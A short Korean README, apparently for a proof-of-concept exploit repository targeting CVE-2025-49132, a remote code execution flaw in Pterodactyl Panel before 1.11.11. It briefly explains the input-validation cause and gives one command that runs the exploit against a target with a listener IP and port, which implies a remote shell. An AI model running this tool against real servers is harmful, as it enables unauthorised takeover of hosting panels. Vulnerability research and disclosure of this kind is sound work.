
이 스크립트는 Pterodactyl Panel < 1.11.11의 원격 코드 실행(RCE) 취약점을 악용합니다.
이 저장소는 Pterodactyl Panel < 1.11.11에 영향을 미치는 원격 코드 실행(RCE) 취약점인 CVE-2025-49132에 대한 개념 증명(PoC)을 포함합니다. 이 PoC는 연구 및 교육 목적으로 통제된 실험실 환경에서 개발 및 테스트되었습니다.
이 취약점은 요청 핸들러에서 사용자 제어 입력에 대한 검증이 충분하지 않아 발생하며, 이로 인해 의도하지 않은 백엔드 상호 작용이 가능해집니다. 특정 조건에서 이는 원격 명령 실행으로 이어질 수 있습니다.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>